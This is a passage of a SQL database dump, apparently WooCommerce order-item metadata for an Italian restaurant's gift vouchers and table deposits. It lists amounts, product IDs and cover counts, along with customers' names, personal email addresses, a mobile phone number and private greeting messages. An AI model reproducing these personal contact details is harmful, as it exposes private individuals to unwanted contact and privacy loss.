_product_id','328'),(2847,293,'_variation_id','0'),(2848,293,'_qty','1'),(2849,293,'_tax_class',''),(2850,293,'_line_subtotal','90'),(2851,293,'_line_subtotal_tax','0'),(2852,293,'_line_total','90'),(2853,293,'_line_tax','0'),(2854,293,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2855,293,'_reduced_stock','1'),(2865,295,'_product_id','322'),(2866,295,'_variation_id','0'),(2867,295,'_qty','1'),(2868,295,'_tax_class',''),(2869,295,'_line_subtotal','60'),(2870,295,'_line_subtotal_tax','0'),(2871,295,'_line_total','60'),(2872,295,'_line_tax','0'),(2873,295,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2874,295,'_reduced_stock','1'),(2875,296,'_product_id','327'),(2876,296,'_variation_id','0'),(2877,296,'_qty','1'),(2878,296,'_tax_class',''),(2879,296,'_line_subtotal','60'),(2880,296,'_line_subtotal_tax','0'),(2881,296,'_line_total','60'),(2882,296,'_line_tax','0'),(2883,296,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2884,296,'_reduced_stock','1'),(2885,297,'_product_id','324'),(2886,297,'_variation_id','0'),(2887,297,'_qty','1'),(2888,297,'_tax_class',''),(2889,297,'_line_subtotal','120'),(2890,297,'_line_subtotal_tax','0'),(2891,297,'_line_total','120'),(2892,297,'_line_tax','0'),(2893,297,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2894,298,'_product_id','322'),(2895,298,'_variation_id','0'),(2896,298,'_qty','1'),(2897,298,'_tax_class',''),(2898,298,'_line_subtotal','60'),(2899,298,'_line_subtotal_tax','0'),(2900,298,'_line_total','60'),(2901,298,'_line_tax','0'),(2902,298,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2903,298,'_reduced_stock','1'),(2904,299,'_product_id','324'),(2905,299,'_variation_id','0'),(2906,299,'_qty','1'),(2907,299,'_tax_class',''),(2908,299,'_line_subtotal','120'),(2909,299,'_line_subtotal_tax','0'),(2910,299,'_line_total','120'),(2911,299,'_line_tax','0'),(2912,299,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2913,300,'_product_id','322'),(2914,300,'_variation_id','0'),(2915,300,'_qty','1'),(2916,300,'_tax_class',''),(2917,300,'_line_subtotal','60'),(2918,300,'_line_subtotal_tax','0'),(2919,300,'_line_total','60'),(2920,300,'_line_tax','0'),(2921,300,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2922,300,'_reduced_stock','1'),(2923,301,'_product_id','324'),(2924,301,'_variation_id','0'),(2925,301,'_qty','1'),(2926,301,'_tax_class',''),(2927,301,'_line_subtotal','120'),(2928,301,'_line_subtotal_tax','0'),(2929,301,'_line_total','120'),(2930,301,'_line_tax','0'),(2931,301,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2932,302,'_product_id','324'),(2933,302,'_variation_id','0'),(2934,302,'_qty','1'),(2935,302,'_tax_class',''),(2936,302,'_line_subtotal','120'),(2937,302,'_line_subtotal_tax','0'),(2938,302,'_line_total','120'),(2939,302,'_line_tax','0'),(2940,302,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2941,302,'_reduced_stock','1'),(2951,304,'_product_id','329'),(2952,304,'_variation_id','0'),(2953,304,'_qty','1'),(2954,304,'_tax_class',''),(2955,304,'_line_subtotal','120'),(2956,304,'_line_subtotal_tax','0'),(2957,304,'_line_total','120'),(2958,304,'_line_tax','0'),(2959,304,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2960,304,'_reduced_stock','1'),(2961,305,'_product_id','323'),(2962,305,'_variation_id','0'),(2963,305,'_qty','1'),(2964,305,'_tax_class',''),(2965,305,'_line_subtotal','90'),(2966,305,'_line_subtotal_tax','0'),(2967,305,'_line_total','90'),(2968,305,'_line_tax','0'),(2969,305,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2988,308,'_product_id','324'),(2989,308,'_variation_id','0'),(2990,308,'_qty','1'),(2991,308,'_tax_class',''),(2992,308,'_line_subtotal','120'),(2993,308,'_line_subtotal_tax','0'),(2994,308,'_line_total','120'),(2995,308,'_line_tax','0'),(2996,308,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2997,308,'_reduced_stock','1'),(2998,305,'_reduced_stock','1'),(2999,309,'_product_id','322'),(3000,309,'_variation_id','0'),(3001,309,'_qty','1'),(3002,309,'_tax_class',''),(3003,309,'_line_subtotal','60'),(3004,309,'_line_subtotal_tax','0'),(3005,309,'_line_total','60'),(3006,309,'_line_tax','0'),(3007,309,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3008,309,'_reduced_stock','1'),(3009,310,'_product_id','327'),(3010,310,'_variation_id','0'),(3011,310,'_qty','1'),(3012,310,'_tax_class',''),(3013,310,'_line_subtotal','60'),(3014,310,'_line_subtotal_tax','0'),(3015,310,'_line_total','60'),(3016,310,'_line_tax','0'),(3017,310,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3018,310,'_reduced_stock','1'),(3019,311,'_product_id','548'),(3020,311,'_variation_id','0'),(3021,311,'_qty','1'),(3022,311,'_tax_class',''),(3023,311,'_line_subtotal','80'),(3024,311,'_line_subtotal_tax','0'),(3025,311,'_line_total','80'),(3026,311,'_line_tax','0'),(3027,311,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3028,311,'To','Andrea'),(3029,311,'From','Beffi Cav Marco Sara Luca Paolo Marchino Mari'),(3030,311,'Message','Tanti auguri di buon compleanno al nostro Andreino nazionale da tutti noi e cento di questi giorni (con la speranza di battere tanti 2.8 ahah) e come direbbe il Paolonissimo MA MAGARI!!!!'),(3031,311,'Delivery Method','Downloadable'),(3032,311,'Image','foto gruppo.jpg'),(3033,312,'_product_id','548'),(3034,312,'_variation_id','0'),(3035,312,'_qty','1'),(3036,312,'_tax_class',''),(3037,312,'_line_subtotal','166'),(3038,312,'_line_subtotal_tax','0'),(3039,312,'_line_total','166'),(3040,312,'_line_tax','0'),(3041,312,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3042,312,'To','Donatella '),(3043,312,'From','Paola '),(3044,312,'Message','Aleee ti sposiii'),(3045,312,'Delivery Method','Downloadable'),(3046,313,'_product_id','548'),(3047,313,'_variation_id','0'),(3048,313,'_qty','1'),(3049,313,'_tax_class',''),(3050,313,'_line_subtotal','195'),(3051,313,'_line_subtotal_tax','0'),(3052,313,'_line_total','195'),(3053,313,'_line_tax','0'),(3054,313,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3055,313,'To','marscudellari@gmail.com'),(3056,313,'From','Maria Scudellari'),(3057,313,'Message','Caparra per 13 persone cena del 8.06 ore 21.45 recapito 3383106260 nome prenotazione Maria Scudellari'),(3058,313,'Delivery Method','Mail to recipient'),(3059,314,'_product_id','548'),(3060,314,'_variation_id','0'),(3061,314,'_qty','1'),(3062,314,'_tax_class',''),(3063,314,'_line_subtotal','100'),(3064,314,'_line_subtotal_tax','0'),(3065,314,'_line_total','100'),(3066,314,'_line_tax','0'),(3067,314,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3068,314,'To','barbara8riceci@gmail.com'),(3069,314,'From','Andrea, Melissa, Barbara, Luisa'),(3070,314,'Message','Auguri per il vostro matrimonio!'),(3071,314,'Delivery Method','Mail to recipient'),(3072,315,'_product_id','475'),(3073,315,'_variation_id','0'),(3074,315,'_qty','1'),(3075,315,'_tax_class',''),(3076,315,'_line_subtotal','115'),(3077,315,'_line_subtotal_tax','0'),(3078,315,'_line_total','115'),(3079,315,'_line_tax','0'),(3080,315,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3081,315,'To','kristicenolli@gmail.com'),(3082,315,'From','Rebecca'),(3083,315,'Message','tanti auguri amore <3<3'),(3084,315,'Delivery Method','Mail to recipient'),(3085,315,'Image','IMG_0452.jpg'),(3086,316,'_product_id','548'),(3087,316,'_variation_id','0'),(3088,316,'_qty','1'),(3089,316,'_tax_class',''),(3090,316,'_line_subtotal','135'),(3091,316,'_line_subtotal_tax','0'),(3092,316,'_line_total','135'),(3093,316,'_line_tax','0'),(3094,316,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3095,316,'To','michele.moffa@yahoo.it'),(3096,316,'From','Michele Moffa'),(3097,316,'Message','Acconto cena sabato sera 8 giugno - MOFFA'),(3098,316,'Delivery Method','Mail to recipient'),(3099,317,'_product_id','548'),(3100,317,'_variation_id','0'),(3101,317,'_qty','11'),(3102,317,'_tax_class',''),(3103,317,'_line_subtotal','165'),(3104,317,'_line_subtotal_tax','0'),(3105,317,'_line_total','165'),(3106,317,'_line_tax','0'),(3107,317,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3108,317,'To','robbimalavasi@gmail.com'),(3109,317,'From','Malavasi Roberto'),(3110,317,'Message','Malavasi Roberto. Caparra confermatoria per cena di venerdì 14/06/2019. 11 Persone. 10 Menù tradizionali pesce + 1 menù di terra tagliatella al ragù + tagliata di carne. Ora di arrivo 21.30-21.45. Vedi scambio di mail per condizioni concordate.  '),(3111,317,'Delivery Method','Mail to recipient'),(3112,318,'_product_id','475'),(3113,318,'_variation_id','0'),(3114,318,'_qty','1'),(3115,318,'_tax_class',''),(3116,318,'_line_subtotal','115'),(3117,318,'_line_subtotal_tax','0'),(3118,318,'_line_total','115'),(3119,318,'_line_tax','0'),(3120,318,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3121,318,'To','Raffaella e Piergiorgio'),(3122,318,'From','Chiara Cenci, Maddalena Argelli, Beatrice Paganelli, Caterina Bordoni, Martina Pagliarani, Caterina Bracci'),(3123,318,'Message','Tanti auguri Raffa e Pier!'),(3124,318,'Delivery Method','Downloadable'),(3125,318,'Image','92D1D7FF-8F9A-4059-91C3-452994EAA79F.jpeg'),(3139,320,'_product_id','548'),(3140,320,'_variation_id','0'),(3141,320,'_qty','1'),(3142,320,'_tax_class',''),(3143,320,'_line_subtotal','120'),(3144,320,'_line_subtotal_tax','0'),(3145,320,'_line_total','120'),(3146,320,'_line_tax','0'),(3147,320,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3148,320,'To','francesca.fontanesi@gmail.com'),(3149,320,'From','fontanesi francesca'),(3150,320,'Message','caparra cena 22 giugno 2019 8 persone fontanesi francesca'),(3151,320,'Delivery Method','Mail to recipient'),(3152,321,'_product_id','475'),(3153,321,'_variation_id','0'),(3154,321,'_qty','1'),(3155,321,'_tax_class',''),(3156,321,'_line_subtotal','115'),(3157,321,'_line_subtotal_tax','0'),(3158,321,'_line_total','115'),(3159,321,'_line_tax','0'),(3160,321,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3161,321,'To','gabriellabava18@gmail.com'),(3162,321,'From','GABRIELLA BAVA'),(3163,321,'Message','VINCITRICE PARRUCCHIERA INSIDE!'),(3164,321,'Delivery Method','Mail to recipient'),(3165,322,'_product_id','472'),(3166,322,'_variation_id','0'),(3167,322,'_qty','1'),(3168,322,'_tax_class',''),(3169,322,'_line_subtotal','125'),(3170,322,'_line_subtotal_tax','0'),(3171,322,'_line_total','125'),(3172,322,'_line_tax','0'),(3173,322,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3174,322,'To','Babbo e mamma'),(3175,322,'From','Laura e Lisa'),(3176,322,'Message','Tantissimi auguri di buon compleanno a mamma e babbo...e buon anniversario... da chi vi ama tanto!\r\nGodetevi questa serata speciale proprio come voi!'),(3177,322,'Delivery Method','Downloadable'),(3178,322,'Original Price','125'),(3179,323,'_product_id','548'),(3180,323,'_variation_id','0'),(3181,323,'_qty','14'),(3182,323,'_tax_class',''),(3183,323,'_line_subtotal','210'),(3184,323,'_line_subtotal_tax','0'),(3185,323,'_line_total','210'),(3186,323,'_line_tax','0'),(3187,323,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3188,323,'To Name','andrea'),(3189,323,'To','lambruscokiller@email.it'),(3190,323,'From','lambruscokiller@email.it'),(3191,323,'Message','andrea'),(3192,323,'Delivery Method','Mail to recipient'),(3193,323,'Original Price','15'),(3194,324,'_product_id','875'),(3195,324,'_variation_id','880'),(3196,324,'_qty','1'),(3197,324,'_tax_class',''),(3198,324,'_line_subtotal','120'),(3199,324,'_line_subtotal_tax','0'),(3200,324,'_line_total','120'),(3201,324,'_line_tax','0'),(3202,324,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3203,324,'pa_numero-coperti','8'),(3204,325,'_product_id','875'),(3205,325,'_variation_id','880'),(3206,325,'_qty','1'),(3207,325,'_tax_class',''),(3208,325,'_line_subtotal','120'),(3209,325,'_line_subtotal_tax','0'),(3210,325,'_line_total','120'),(3211,325,'_line_tax','0'),(3212,325,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3213,325,'pa_numero-coperti','8'),(3214,326,'_product_id','875'),(3215,326,'_variation_id','880'),(3216,326,'_qty','1'),(3217,326,'_tax_class',''),(3218,326,'_line_subtotal','120'),(3219,326,'_line_subtotal_tax','0'),(3220,326,'_line_total','120'),(3221,326,'_line_tax','0'),(3222,326,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3223,326,'pa_numero-coperti','8'),(3224,327,'_product_id','472'),(3225,327,'_variation_id','0'),(3226,327,'_qty','1'),(3227,327,'_tax_class',''),(3228,327,'_line_subtotal','125'),(3229,327,'_line_subtotal_tax','0'),(3230,327,'_line_total','125'),(3231,327,'_line_tax','0'),(3232,327,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3233,327,'To','maria11556@mail.ru'),(3234,327,'From','Maria Dyatlova'),(3235,327,'Message','Grazie mille!'),(3236,327,'Delivery Method','Downloadable'),(3237,327,'Original Price','125'),(3238,328,'_product_id','472'),(3239,328,'_variation_id','0'),(3240,328,'_qty','2'),(3241,328,'_tax_class',''),(3242,328,'_line_subtotal','250'),(3243,328,'_line_subtotal_tax','0'),(3244,328,'_line_total','250'),(3245,328,'_line_tax','0'),(3246,328,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3247,328,'To','maria11556@mail.ru'),(3248,328,'From','Maria Dyatlova'),(3249,328,'Message','Grazie mille!'),(3250,328,'Delivery Method','Downloadable'),(3251,328,'Original Price','125'),(3252,329,'_product_id','472'),(3253,329,'_variation_id','0'),(3254,329,'_qty','1'),(3255,329,'_tax_class',''),(3256,329,'_line_subtotal','125'),(3257,329,'_line_subtotal_tax','0'),(3258,329,'_line_total','125'),(3259,329,'_line_tax','0'),(3260,329,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3261,329,'To','Gabriele Monesi'),(3262,329,'From','Maria Dyatlova'),(3263,329,'Message','Grazie mille per tutto!'),(3264,329,'Delivery Method','Downloadable'),(3265,329,'Original Price','125'),(3266,330,'_product_id','472'),(3267,330,'_variation_id','0'),(3268,330,'_qty','1'),(3269,330,'_tax_class',''),(3270,330,'_line_subtotal','125'),(3271,330,'_line_subtotal_tax','0'),(3272,330,'_line_total','125'),(3273,330,'_line_tax','0'),(3274,330,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3275,330,'To','Serena'),(3276,330,'From','Family'),(3277,330,'Message','Dopo una buona cena si può perdonare chiunque, persino i parenti.\r\nBuon compleanno !!'),(3278,330,'Delivery Method','Downloadable'),(3279,330,'Original Price','125'),(3280,331,'_product_id','875'),(3281,331,'_variation_id','880'),(3282,331,'_qty','2'),(3283,331,'_tax_class',''),(3284,331,'_line_subtotal','240'),(3285,331,'_line_subtotal_tax','0'),(3286,331,'_line_total','240'),(3287,331,'_line_tax','0'),(3288,331,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3289,331,'pa_numero-coperti','8'),(3310,334,'_product_id','875'),(3311,334,'_variation_id','880'),(3312,334,'_qty','3'),(3313,334,'_tax_class',''),(3314,334,'_line_subtotal','360'),(3315,334,'_line_subtotal_tax','0'),(3316,334,'_line_total','360'),(3317,334,'_line_tax','0'),(3318,334,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3319,334,'pa_numero-coperti','8'),(3320,335,'_product_id','875'),(3321,335,'_variation_id','878'),(3322,335,'_qty','1'),(3323,335,'_tax_class',''),(3324,335,'_line_subtotal','90'),(3325,335,'_line_subtotal_tax','0'),(3326,335,'_line_total','90'),(3327,335,'_line_tax','0'),(3328,335,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3329,335,'pa_numero-coperti','6'),(3330,336,'_product_id','875'),(3331,336,'_variation_id','880'),(3332,336,'_qty','2'),(3333,336,'_tax_class',''),(3334,336,'_line_subtotal','240'),(3335,336,'_line_subtotal_tax','0'),(3336,336,'_line_total','240'),(3337,336,'_line_tax','0'),(3338,336,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3339,336,'pa_numero-coperti','8'),(3340,337,'_product_id','875'),(3341,337,'_variation_id','877'),(3342,337,'_qty','1'),(3343,337,'_tax_class',''),(3344,337,'_line_subtotal','75'),(3345,337,'_line_subtotal_tax','0'),(3346,337,'_line_total','75'),(3347,337,'_line_tax','0'),(3348,337,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3349,337,'pa_numero-coperti','5'),(3350,338,'_product_id','875'),(3351,338,'_variation_id','876'),(3352,338,'_qty','1'),(3353,338,'_tax_class',''),(3354,338,'_line_subtotal','60'),(3355,338,'_line_subtotal_tax','0'),(3356,338,'_line_total','60'),(3357,338,'_line_tax','0'),(3358,338,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3359,338,'pa_numero-coperti','4'),(3360,339,'_product_id','474'),(3361,339,'_variation_id','0'),(3362,339,'_qty','1'),(3363,339,'_tax_class',''),(3364,339,'_line_subtotal','93'),(3365,339,'_line_subtotal_tax','0'),(3366,339,'_line_total','93'),(3367,339,'_line_tax','0'),(3368,339,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3369,339,'To Name','Diletta'),(3370,339,'To','diletta74@hotmail.it'),(3371,339,'From','Eveline'),(3372,339,'Message','Vincitrice concorso Selfie'),(3373,339,'Delivery Method','Mail to recipient'),(3374,339,'Original Price','93'),(3375,339,'Selected Template','468'),(3376,340,'_product_id','472'),(3377,340,'_variation_id','0'),(3378,340,'_qty','1'),(3379,340,'_tax_class',''),(3380,340,'_line_subtotal','125'),(3381,340,'_line_subtotal_tax','0'),(3382,340,'_line_total','125'),(3383,340,'_line_tax','0'),(3384,340,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3385,340,'To','manuel.francavilla@gmail.com'),(3386,340,'From','Manuel & Valentina'),(3387,340,'Message','Buon Natale !!!!!'),(3388,340,'Delivery Method','Downloadable'),(3389,340,'Original Price','125'),(3390,341,'_product_id','875'),(3391,341,'_variation_id','880'),(3392,341,'_qty','1'),(3393,341,'_tax_class',''),(3394,341,'_line_subtotal','120'),(3395,341,'_line_subtotal_tax','0'),(3396,341,'_line_total','120'),(3397,341,'_line_tax','0'),(3398,341,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3399,341,'pa_numero-coperti','8'),(3400,342,'_product_id','875'),(3401,342,'_variation_id','881'),(3402,342,'_qty','2'),(3403,342,'_tax_class',''),(3404,342,'_line_subtotal','60'),(3405,342,'_line_subtotal_tax','0'),(3406,342,'_line_total','60'),(3407,342,'_line_tax','0'),(3408,342,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3409,342,'pa_numero-coperti','2'),(3410,343,'_product_id','875'),(3411,343,'_variation_id','882'),(3412,343,'_qty','1'),(3413,343,'_tax_class',''),(3414,343,'_line_subtotal','45'),(3415,343,'_line_subtotal_tax','0'),(3416,343,'_line_total','45'),(3417,343,'_line_tax','0'),(3418,343,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3419,343,'pa_numero-coperti','3'),(3420,344,'_product_id','875'),(3421,344,'_variation_id','881'),(3422,344,'_qty','1'),(3423,344,'_tax_class',''),(3424,344,'_line_subtotal','30'),(3425,344,'_line_subtotal_tax','0'),(3426,344,'_line_total','30'),(3427,344,'_line_tax','0'),(3428,344,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3429,344,'pa_numero-coperti','2'),(3430,345,'_product_id','875'),(3431,345,'_variation_id','876'),(3432,345,'_qty','2'),(3433,345,'_tax_class',''),(3434,345,'_line_subtotal','120'),(3435,345,'_line_subtotal_tax','0'),(3436,345,'_line_total','120'),(3437,345,'_line_tax','0'),(3438,345,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3439,345,'pa_numero-coperti','4'),(3440,346,'_product_id','875'),(3441,346,'_variation_id','881'),(3442,346,'_qty','1'),(3443,346,'_tax_class',''),(3444,346,'_line_subtotal','30'),(3445,346,'_line_subtotal_tax','0'),(3446,346,'_line_total','30'),(3447,346,'_line_tax','0'),(3448,346,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3449,346,'pa_numero-coperti','2'),(3450,347,'_product_id','875'),(3451,347,'_variation_id','881'),(3452,347,'_qty','2'),(3453,347,'_tax_class',''),(3454,347,'_line_subtotal','60'),(3455,347,'_line_subtotal_tax','0'),(3456,347,'_line_total','60'),(3457,347,'_line_tax','0'),(3458,347,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3459,347,'pa_numero-coperti','2'),(3460,348,'_product_id','875'),(3461,348,'_variation_id','880'),(3462,348,'_qty','1'),(3463,348,'_tax_class',''),(3464,348,'_line_subtotal','120'),(3465,348,'_line_subtotal_tax','0'),(3466,348,'_line_total','120'),(3467,348,'_line_tax','0'),(3468,348,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3469,348,'pa_numero-coperti','8'),(3470,349,'_product_id','548'),(3471,349,'_variation_id','0'),(3472,349,'_qty','1'),(3473,349,'_tax_class',''),(3474,349,'_line_subtotal','60'),(3475,349,'_line_subtotal_tax','0'),(3476,349,'_line_total','60'),(3477,349,'_line_tax','0'),(3478,349,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3479,349,'To Name','girardimarco61@gmail.com'),(3480,349,'To','girardimarco61@gmail.com'),(3481,349,'From','Marco e Paola Girardi'),(3482,349,'Message','Caparrax2 31/12, aggiunta tavolo Lazzari'),(3483,349,'Delivery Method','Mail to recipient'),(3484,349,'Original Price','60'),(3485,350,'_product_id','875'),(3486,350,'_variation_id','881'),(3487,350,'_qty','1'),(3488,350,'_tax_class',''),(3489,350,'_line_subtotal','30'),(3490,350,'_line_subtotal_tax','0'),(3491,350,'_line_total','30'),(3492,350,'_line_tax','0'),(3493,350,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3494,350,'pa_numero-coperti','2'),(3515,353,'_product_id','875'),(3516,353,'_variation_id','881'),(3517,353,'_qty','1'),(3518,353,'_tax_class',''),(3519,353,'_line_subtotal','30'),(3520,353,'_line_subtotal_tax','0'),(3521,353,'_line_total','30'),(3522,353,'_line_tax','0'),(3523,353,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3524,353,'pa_numero-coperti','2'),(3525,354,'_product_id','548'),(3526,354,'_variation_id','0'),(3527,354,'_qty','1'),(3528,354,'_tax_class',''),(3529,354,'_line_subtotal','90'),(3530,354,'_line_subtotal_tax','0'),(3531,354,'_line_total','90'),(3532,354,'_line_tax','0'),(3533,354,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3534,354,'To','mamma e papà'),(3535,354,'From','Vally e Lola'),(3536,354,'Message','Tantissimi auguroni di Buon Natale dalle vostre meravigliose figlie!!\r\n\r\nLola e Vally'),(3537,354,'Delivery Method','Downloadable'),(3538,354,'Original Price','90'),(3539,355,'_product_id','875'),(3540,355,'_variation_id','881'),(3541,355,'_qty','1'),(3542,355,'_tax_class',''),(3543,355,'_line_subtotal','30'),(3544,355,'_line_subtotal_tax','0'),(3545,355,'_line_total','30'),(3546,355,'_line_tax','0'),(3547,355,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3548,355,'pa_numero-coperti','2'),(3549,356,'_product_id','875'),(3550,356,'_variation_id','881'),(3551,356,'_qty','1'),(3552,356,'_tax_class',''),(3553,356,'_line_subtotal','30'),(3554,356,'_line_subtotal_tax','0'),(3555,356,'_line_total','30'),(3556,356,'_line_tax','0'),(3557,356,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3558,356,'pa_numero-coperti','2'),(3559,357,'_product_id','875'),(3560,357,'_variation_id','881'),(3561,357,'_qty','1'),(3562,357,'_tax_class',''),(3563,357,'_line_subtotal','30'),(3564,357,'_line_subtotal_tax','0'),(3565,357,'_line_total','30'),(3566,357,'_line_tax','0'),(3567,357,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3568,357,'pa_numero-coperti','2'),(3569,358,'_product_id','875'),(3570,358,'_variation_id','881'),(3571,358,'_qty','1'),(3572,358,'_tax_class',''),(3573,358,'_line_subtotal','30'),(3574,358,'_line_subtotal_tax','0'),(3575,358,'_line_total','30'),(3576,358,'_line_tax','0'),(3577,358,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3578,358,'pa_numero-coperti','2'),(3579,359,'_product_id','875'),(3580,359,'_variation_id','882'),(3581,359,'_qty','1'),(3582,359,'_tax_class',''),(3583,359,'_line_subtotal','45'),(3584,359,'_line_subtotal_tax','0'),(3585,359,'_line_total','45'),(3586,359,'_line_tax','0'),(3587,359,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3588,359,'pa_numero-coperti','3'),(3589,360,'_product_id','875'),(3590,360,'_variation_id','881'),(3591,360,'_qty','1'),(3592,360,'_tax_class',''),(3593,360,'_line_subtotal','30'),(3594,360,'_line_subtotal_tax','0'),(3595,360,'_line_total','30'),(3596,360,'_line_tax','0'),(3597,360,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3598,360,'pa_numero-coperti','2'),(3599,361,'_product_id','288'),(3600,361,'_variation_id','0'),(3601,361,'_qty','1'),(3602,361,'_tax_class',''),(3603,361,'_line_subtotal','30'),(3604,361,'_line_subtotal_tax','0'),(3605,361,'_line_total','30'),(3606,361,'_line_tax','0'),(3607,361,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3608,361,'_reduced_stock','1'),(3609,362,'_product_id','288'),(3610,362,'_variation_id','0'),(3611,362,'_qty','1'),(3612,362,'_tax_class',''),(3613,362,'_line_subtotal','30'),(3614,362,'_line_subtotal_tax','0'),(3615,362,'_line_total','30'),(3616,362,'_line_tax','0'),(3617,362,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3618,362,'_reduced_stock','1'),(3619,363,'_product_id','288'),(3620,363,'_variation_id','0'),(3621,363,'_qty','1'),(3622,363,'_tax_class',''),(3623,363,'_line_subtotal','30'),(3624,363,'_line_subtotal_tax','0'),(3625,363,'_line_total','30'),(3626,363,'_line_tax','0'),(3627,363,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3628,363,'_reduced_stock','1'),(3629,364,'_product_id','548'),(3630,364,'_variation_id','0'),(3631,364,'_qty','1'),(3632,364,'_tax_class',''),(3633,364,'_line_subtotal','100'),(3634,364,'_line_subtotal_tax','0'),(3635,364,'_line_total','100'),(3636,364,'_line_tax','0'),(3637,364,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(3638,364,'To','Leonarda e Giorgio'),(3639,364,'From','Tommaso'),(3640,364,'Message','Buon 